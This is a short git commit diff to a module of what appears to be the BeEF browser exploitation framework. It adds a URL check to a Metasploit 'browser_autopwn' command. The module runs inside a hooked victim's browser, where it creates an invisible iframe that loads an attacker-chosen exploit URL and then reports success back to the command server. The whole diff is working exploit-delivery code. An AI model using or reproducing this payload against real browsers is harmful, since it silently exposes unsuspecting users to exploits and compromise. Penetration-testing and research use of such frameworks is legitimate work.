Add autopwn URL validation

2015-08-22 18:03:10 +00:00
parent 2b19c2dd13
commit cfd1584d0c
1 changed files with 7 additions and 2 deletions
--- a/modules/metasploit/browser_autopwn/command.js
+++ b/modules/metasploit/browser_autopwn/command.js
@@ -5,7 +5,12 @@
 //

 beef.execute(function() {
+	url = '<%= @sploit_url %>';
+	if (!/https?:\/\//i.test(url)) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "error=invalid url");
+		return;
+	}
 	var sploit = beef.dom.createInvisibleIframe();
-        sploit.src = '<%= @sploit_url %>';
-    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IFrame Created!");
+        sploit.src = url;
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IFrame Created!");
 });